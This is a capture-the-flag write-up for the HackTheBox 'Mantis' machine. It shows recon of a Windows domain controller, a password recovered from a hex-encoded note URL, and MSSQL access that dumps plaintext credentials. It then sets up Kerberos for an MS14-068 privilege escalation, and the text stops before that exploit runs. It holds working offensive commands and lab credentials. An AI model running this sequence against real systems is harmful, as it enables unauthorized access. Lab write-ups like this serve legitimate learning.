Home Mantis HTB
Post
Cancel

Mantis HTB

Mantis

Mantis was one of those Windows targets where it’s just a ton of enumeration until you get a System shell. The exploit is where a low level user was allowed to make a privileged Kerberos ticket.

  • Nmap
  • Recon
  • SQL Credential , Get a user james
  • ms14-068.py low privelege user to system user impersonate admin priv.

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-23 02:25:41Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp   open  tcpwrapped
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
8080/tcp  open  http         Microsoft IIS httpd 7.5
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: 0s
| ms-sql-info: 
|   10.129.167.60:1433: 
|     Version: 
|       name: Microsoft SQL Server 2014 RTM
|       number: 12.00.2000.00
|       Product: Microsoft SQL Server 2014
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-os-discovery: 
|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: mantis
|   NetBIOS computer name: MANTIS\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: mantis.htb.local
|_  System time: 2021-07-22T22:26:38-04:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-07-23T02:26:42z
|_  start_date: 2021-07-23T02:24:20
PORT      STATE SERVICE  VERSION
1337/tcp  open  http     Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
1433/tcp  open  ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: MANTIS
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: mantis.htb.local
|   DNS_Tree_Name: htb.local
|_  Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-07-23T02:24:48
|_Not valid after:  2051-07-23T02:24:48
|_ssl-date: 2021-07-23T02:30:39+00:00; 0s from scanner time.
5722/tcp  open  msrpc    Microsoft Windows RPC
9389/tcp  open  mc-nmf   .NET Message Framing
47001/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc    Microsoft Windows RPC
49164/tcp open  msrpc    Microsoft Windows RPC
49166/tcp open  msrpc    Microsoft Windows RPC
49168/tcp open  msrpc    Microsoft Windows RPC
50255/tcp open  ms-sql-s Microsoft SQL Server 2014 12.00.2000
| ms-sql-ntlm-info: 
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: MANTIS
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: mantis.htb.local
|   DNS_Tree_Name: htb.local
|_  Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-07-23T02:24:48
|_Not valid after:  2051-07-23T02:24:48
|_ssl-date: 2021-07-23T02:30:39+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| ms-sql-info: 
|   10.129.167.60:1433: 
|     Version: 
|       name: Microsoft SQL Server 2014 RTM
|       number: 12.00.2000.00
|       Product: Microsoft SQL Server 2014
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433

We have good number of ports open. Let’s enumerate and gather as much information as possible

Port 53

1
dig @10.129.167.60 -x 10.129.167.60

No PTR records. Let’s skip this for now.

Port 135,139,445 Enumerate rpcinfo data

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Jul 23 09:42:29 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.129.167.60
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===================================================== 
|    Enumerating Workgroup/Domain on 10.129.167.60    |
 ===================================================== 
[E] Can;t find workgroup/domain


 ============================================= 
|    Nbtstat Information for 10.129.167.60    |
 ============================================= 
Looking up status of 10.129.167.60
No reply from 10.129.167.60

 ====================================== 
|    Session Check on 10.129.167.60    |
 ====================================== 
[+] Server 10.129.167.60 allows sessions using username '', password ''
[+] Got domain/workgroup name: 

 ============================================ 
|    Getting domain SID for 10.129.167.60    |
 ============================================ 
Domain Name: HTB
Domain Sid: S-1-5-21-4220043660-4019079961-2895681657
[+] Host is part of a domain (not a workgroup)

 ======================================= 
|    OS information on 10.129.167.60    |
 ======================================= 
[+] Got OS info for 10.129.167.60 from smbclient: 
[+] Got OS info for 10.129.167.60 from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

 ============================== 
|    Users on 10.129.167.60    |
 ============================== 
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED

[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED

 ========================================== 
|    Share Enumeration on 10.129.167.60    |
 ========================================== 

	Sharename       Type      Comment
	---------       ----      -------
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.129.167.60

 ===================================================== 
|    Password Policy Information for 10.129.167.60    |
 ===================================================== 
[E] Unexpected error from polenum:


[+] Attaching to 10.129.167.60 using a NULL share

[+] Trying protocol 139/SMB...

	[!] Protocol failed: Cannot request session (Called Name:10.129.167.60)

[+] Trying protocol 445/SMB...

	[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.


[E] Failed to get password policy with rpcclient


 =============================== 
|    Groups on 10.129.167.60    |
 =============================== 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ======================================================================== 
|    Users on 10.129.167.60 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================== 
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.

 ============================================== 
|    Getting printer info for 10.129.167.60    |
 ============================================== 
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED


enum4linux complete on Fri Jul 23 09:43:19 2021
1
2
3
4
5
____ $crackmapexec smb 10.129.167.60 -u "" -p "" --shares 
SMB         10.129.167.60   445    MANTIS           [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         10.129.167.60   445    MANTIS           [-] htb.local\: STATUS_ACCESS_DENIED 
SMB         10.129.167.60   445    MANTIS           [-] Error enumerating shares: STATUS_ACCESS_DENIED

Anonymous authentication is disabled. So we need a user to get all the details.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
____ $ldapsearch -h 10.129.167.60 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

We have a domain htb.local. Let’s add it to our /etc/hosts file.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
____ $ldapsearch -h 10.129.167.60 -x -s base
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#

#
dn:
currentTime: 20210723041730.0Z
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=htb,DC=local
dsServiceName: CN=NTDS Settings,CN=MANTIS,CN=Servers,CN=Default-First-Site-Nam
 e,CN=Sites,CN=Configuration,DC=htb,DC=local
namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local
defaultNamingContext: DC=htb,DC=local
schemaNamingContext: CN=Schema,CN=Configuration,DC=htb,DC=local
configurationNamingContext: CN=Configuration,DC=htb,DC=local
rootDomainNamingContext: DC=htb,DC=local
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
highestCommittedUSN: 127061
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
dnsHostName: mantis.htb.local
ldapServiceName: htb.local:mantis$@HTB.LOCAL
serverName: CN=MANTIS,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Config
 uration,DC=htb,DC=local
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
isSynchronized: TRUE
isGlobalCatalogReady: TRUE
domainFunctionality: 4
forestFunctionality: 4
domainControllerFunctionality: 4

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

We have another domain manits.htb.local let’s save it.

Port 1337 [Pasted image 20210723103411.png]

Let’s Bruteforce and see if we have any directories.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
____ $ffuf -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -u http://htb.local:1337/FUZZ -e aspx, 
asp                                                            

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1-dev                                              
________________________________________________

 :: Method           : GET                                     
 :: URL              : http://htb.local:1337/FUZZ
 :: Wordlist         : FUZZ: /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt                         
 :: Extensions       : aspx asp 
 :: Follow redirects : false                                   
 :: Calibration      : false                                   
 :: Timeout          : 10                                      
 :: Threads          : 40                                      
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405                                                        
________________________________________________

aspnet_client           [Status: 301, Size: 159, Words: 9, Lines: 2, Duration: 166ms]                                          
                        [Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 165ms]                                        
:: Progress: [79752/79752] :: Job [1/1] :: 232 req/sec :: Duration: [0:05:35] :: Errors: 6 ::         

We did not find much information. Let’s try to brute with IIS-Shortname search as IIS is vulnerable to Shortname Vulnerability.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
____ $java -jar iis_shortname_scanner.jar 2 20 http://htb.local:1337/
magicFileName: *~1*                                            
requestMethodDelimiter: ,        
requestMethod: DEBUG,OPTIONS,GET,POST,HEAD,TRACE               
nameStartsWith:                                                
extStartsWith:                                                 
hassleFree: true                                               
cookies: IIS_Tilde_Scanner=1;
outputFile: iis_shortname_scanner_logfile.txt                  
acceptableDifferenceLengthBetweenResponses: 10
proxyServerPort: 
magicFinalPartList: \a.aspx,\a.asp,/a.aspx,/a.asp,/a.shtml,/a.asmx,/a.ashx,/a.config,/a.php,/a.jpg,/webresource.axd,/a.xxx
headersDelimiter: @@
saveOutput: false
maxNumericalPart: 3
headers: X-Forwarded-For: 127.0.0.1@@X-Originating-IP: 127.0.0.1@@X-Cluster-Client-Ip: 127.0.0.1
useProvidedURLWithoutChange: false
debug: false
maxConnectionTimeOut: 20000
magicFinalPartDelimiter: ,
forceNumericalPart: 1
userAgent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
inScopeCharacters: ETAONRISHDLFCMUGYPWBVKJXQZ0123456789_-$~()&!#%'@^`{}
asteriskSymbol: *
showActualNames: true
maxRetryTimes: 10
maxDelayAfterEachRequest: 1
magicFileExtension: *
URLSuffix: ?&aspxerrorpath=/
questionMarkSymbol: ?

-- Current Configuration -- Begin
Scan Mode: ALL
Number of threads: 20
Config file: config.xml
Scanner version: 2.3.9 (05 February 2017)
-- Current Configuration -- End
Max delay after each request in milliseconds = 1
No proxy has been used.

Scanning...

Testing request method: "DEBUG" with magic part: "\a.aspx" ...
WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by IISShortNameScanner.IIS_ShortName_Scanner (file:/opt/tools/IIS-ShortName-Scanner/iis_shortname_scanner.jar) to field java.net.HttpURLConnection.method
WARNING: Please consider reporting this to the maintainers of IISShortNameScanner.IIS_ShortName_Scanner
WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
WARNING: All illegal access operations will be denied in a future release
Testing request method: "OPTIONS" with magic part: "\a.aspx" ...
Dir: ASPNET~1
Dir: SECURE~1
[-] SECURU
# IIS Short Name (8.3) Scanner version 2.3.9 (05 February 2017) - scan initiated 2021/07/23 11:55:07
Target: http://htb.local:1337/
|_ Result: Vulnerable!
|_ Used HTTP method: OPTIONS
|_ Suffix (magic part): \a.aspx
|_ Extra information:
  |_ Number of sent requests: 268
  |_ Identified directories: 2
    |_ ASPNET~1
    |_ SECURE~1
  |_ Indentified files: 0

Finished in: 19 second(s)

We have some dirctory starting with SECURE

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
____ $grep -E "\bsecure" /opt/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt > secure.txt
____ $ffuf -w secure.txt -u http://htb.local:1337/FUZZ

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://htb.local:1337/FUZZ
 :: Wordlist         : FUZZ: secure.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

secure_notes            [Status: 301, Size: 158, Words: 9, Lines: 2, Duration: 328ms]
:: Progress: [391/391] :: Job [1/1] :: 227 req/sec :: Duration: [0:00:02] :: Errors: 0 ::

We have a directory name secure_notes. Let’s access and check

[Pasted image 20210723120137.png]

[Pasted image 20210723120227.png]

[Pasted image 20210723120242.png]

Also if we have close look on the url the it looks like some kind of hash url

1
http://htb.local:1337/secure_notes/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt

HASH : NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx

1
2
echo -n "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx" | base64 -d
6d2424716c5f53405f504073735730726421
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
___ $hash-identifier 
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------
 HASH: 6d2424716c5f53405f504073735730726421

 Not Found.
--------------------------------------------------

___$ echo -n "6d2424716c5f53405f504073735730726421" | wc -c
36

Invalid hash. Stuck here for a while. Played with the hash for a while and found it is hex representration

1
2
____ $echo -n "6d2424716c5f53405f504073735730726421" | xxd -r -p
m$$ql_S@_P@ssW0rd!

We have a user and a password. Let’s see where we can use these creds

Port 8080

[Pasted image 20210723095612.png]

[Pasted image 20210723130756.png]

Credentials did not work.

Port 1433

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
____ $impacket-mssqlclient 'admin:m$$ql_S@_P@ssW0rd!'@htb.local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208) 
[!] Press help for extra shell commands
SQL> select name from master.sys.databases;
name                                                                                                                               

--------------------------------------------------------------------------------------------------------------------------------   

master                                                                                                                             

tempdb                                                                                                                             

model                                                                                                                              

msdb                                                                                                                               

orcharddb                                                                                                                          

SQL> 

We have orcharddb let’s dump all the information.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
SQL> select table_name from orcharddb.information_schema.tables   
table_name
--------------------------------------------------------------------------------------------------------------------------------    
blog_Orchard_Blogs_RecentBlogPostsPartRecord       
blog_Orchard_Blogs_BlogArchivesPartRecord          
blog_Orchard_Workflows_TransitionRecord            
blog_Orchard_Workflows_WorkflowRecord              
blog_Orchard_Workflows_WorkflowDefinitionRecord 
blog_Orchard_Workflows_AwaitingActivityRecord                
blog_Orchard_Workflows_ActivityRecord                        
blog_Orchard_Tags_TagsPartRecord                             
blog_Orchard_Framework_DataMigrationRecord                   
blog_Orchard_Tags_TagRecord                                  
blog_Orchard_Tags_ContentTagRecord                          
blog_Settings_ContentFieldDefinitionRecord                   
blog_Orchard_Framework_DistributedLockRecord                 
blog_Settings_ContentPartDefinitionRecord                    
blog_Settings_ContentPartFieldDefinitionRecord               
blog_Settings_ContentTypeDefinitionRecord                    
blog_Settings_ContentTypePartDefinitionRecord                
blog_Settings_ShellDescriptorRecord                          
blog_Settings_ShellFeatureRecord                             
blog_Settings_ShellFeatureStateRecord                        
blog_Settings_ShellParameterRecord                           
blog_Settings_ShellStateRecord                               
blog_Orchard_Framework_ContentItemRecord                     
blog_Orchard_Framework_ContentItemVersionRecord              
blog_Orchard_Framework_ContentTypeRecord                     
blog_Orchard_Framework_CultureRecord                         
blog_Common_BodyPartRecord                                   
blog_Common_CommonPartRecord                                 
blog_Common_CommonPartVersionRecord                          
blog_Common_IdentityPartRecord                               
blog_Containers_ContainerPartRecord                          
blog_Containers_ContainerWidgetPartRecord                    
blog_Containers_ContainablePartRecord
blog_Title_TitlePartRecord                                  
blog_Navigation_MenuPartRecord                              
blog_Navigation_AdminMenuPartRecord                         
blog_Scheduling_ScheduledTaskRecord                         
blog_Orchard_ContentPicker_ContentMenuItemPartRecord        
blog_Orchard_Alias_AliasRecord                              
blog_Orchard_Alias_ActionRecord                             
blog_Orchard_Autoroute_AutoroutePartRecord                  
blog_Orchard_Users_UserPartRecord                           
blog_Orchard_Roles_PermissionRecord                         
blog_Orchard_Roles_RoleRecord                               
blog_Orchard_Roles_RolesPermissionsRecord                   
blog_Orchard_Roles_UserRolesPartRecord                      
blog_Orchard_Packaging_PackagingSource                      
blog_Orchard_Recipes_RecipeStepResultRecord                 
blog_Orchard_OutputCache_CacheParameterRecord               
blog_Orchard_MediaProcessing_ImageProfilePartRecord         
blog_Orchard_MediaProcessing_FilterRecord                   
blog_Orchard_MediaProcessing_FileNameRecord                 
blog_Orchard_Widgets_LayerPartRecord                        
blog_Orchard_Widgets_WidgetPartRecord                       
blog_Orchard_Comments_CommentPartRecord                     
blog_Orchard_Comments_CommentsPartRecord                    
blog_Orchard_Taxonomies_TaxonomyPartRecord                  
blog_Orchard_Taxonomies_TermPartRecord                      
blog_Orchard_Taxonomies_TermContentItem                     
blog_Orchard_Taxonomies_TermsPartRecord                     
blog_Orchard_MediaLibrary_MediaPartRecord                   
blog_Orchard_Blogs_BlogPartArchiveRecord  

We have a user table blog_Orchard_Users_UserPartRecord

1
2
3
4
5
6
7
8
9
SQL> select username,password from orcharddb.dbo.blog_Orchard_Users_UserPartRecord
username	password                                                                                                                                                                                                                                                          

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   

admin	AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A==                                                                                                                                                                                              

James	J@m3s_P@ssW0rd!                                                           

One of the user’s credentials are stored in plain text.

User: james Pass: J@m3s_P@ssW0rd!

Let make a note of user in users.txt and password in passwords.txt

Let’s check if james is a member of domain

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
____ $/opt/tools/kerbrute userenum users.txt --dc htb.local -d htb.local

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 07/23/21 - Ronnie Flathers @ropnop

2021/07/23 13:40:21 >  Using KDC(s):
2021/07/23 13:40:21 >   htb.local:88

2021/07/23 13:40:21 >  [+] VALID USERNAME:       james@htb.local
2021/07/23 13:40:21 >  Done! Tested 2 usernames (1 valid) in 0.191 seconds

James user in domain htb.local

1
2
3
4
5
6
7
8
9
10
11
____ $crackmapexec smb htb.local -u users.txt -p passwords.txt --shares
SMB         10.129.167.60   445    MANTIS           [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         10.129.167.60   445    MANTIS           [+] htb.local\james:J@m3s_P@ssW0rd! 
SMB         10.129.167.60   445    MANTIS           [+] Enumerated shares
SMB         10.129.167.60   445    MANTIS           Share           Permissions     Remark
SMB         10.129.167.60   445    MANTIS           -----           -----------     ------
SMB         10.129.167.60   445    MANTIS           ADMIN$                          Remote Admin
SMB         10.129.167.60   445    MANTIS           C$                              Default share
SMB         10.129.167.60   445    MANTIS           IPC$                            Remote IPC
SMB         10.129.167.60   445    MANTIS           NETLOGON        READ            Logon server share 
SMB         10.129.167.60   445    MANTIS           SYSVOL          READ            Logon server share 

After a lot of enumeration

http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html https://wizard32.net/blog/knock-and-pass-kerberos-exploitation.html

/etc/krb5.conf needs to have information about the domain. Based on the blog, I’ll set mine to:

1
2
3
4
5
6
7
8
9
10
11
12
[libdefaults]
    default_realm = HTB.LOCAL

[realms]
    htb.local = {
        kdc = mantis.htb.local:88
        admin_serve = mantis.htb.local
        default_domain = htb.local
    }
[domain_realm]
    .domain.internal = htb.local
    domain.internal = htb.local

I’ll use rdate to check the remote time and make sure it’s within five minutes of my host’s time.

Generate Kerberos Ticket

First I’ll test this config and try to generate a Kerberos ticket:

1
2
root@kali# kinit james
Password for james@HTB.LOCAL: 

klist will show the ticket:

1
2
3
4
5
6
7
root@kali# klist
Ticket cache: FILE:/tmp/krb5cc_0
Default principal: james@HTB.LOCAL

Valid starting       Expires              Service principal
08/30/2020 16:44:33  08/31/2020 02:44:33  krbtgt/HTB.LOCAL@HTB.LOCAL
        renew until 08/31/2020 16:44:26

I can try to connect to C$, and it will fail:

1
2
root@kali# smbclient -W htb.local //mantis/c$ -k
tree connect failed: NT_STATUS_ACCESS_DENIED

That makes sense, since this ticket is for james. If I try to connect to SYSVOL, it works:

1
2
3
root@kali# smbclient -W htb.local //mantis/sysvol -k
Try "help" to get a list of possible commands.
smb: \>

Forge Golden Ticket

First I need the SID for the james user. I’ll get it via rpcclient:

1
2
rpcclient $> lookupnames james
james S-1-5-21-4220043660-4019079961-2895681657-1103 (User: 1)

I was able to find a copy of ms14-068.py here, and I’ll run it just like the help suggests:

1
2
3
4
5
6
7
8
9
10
11
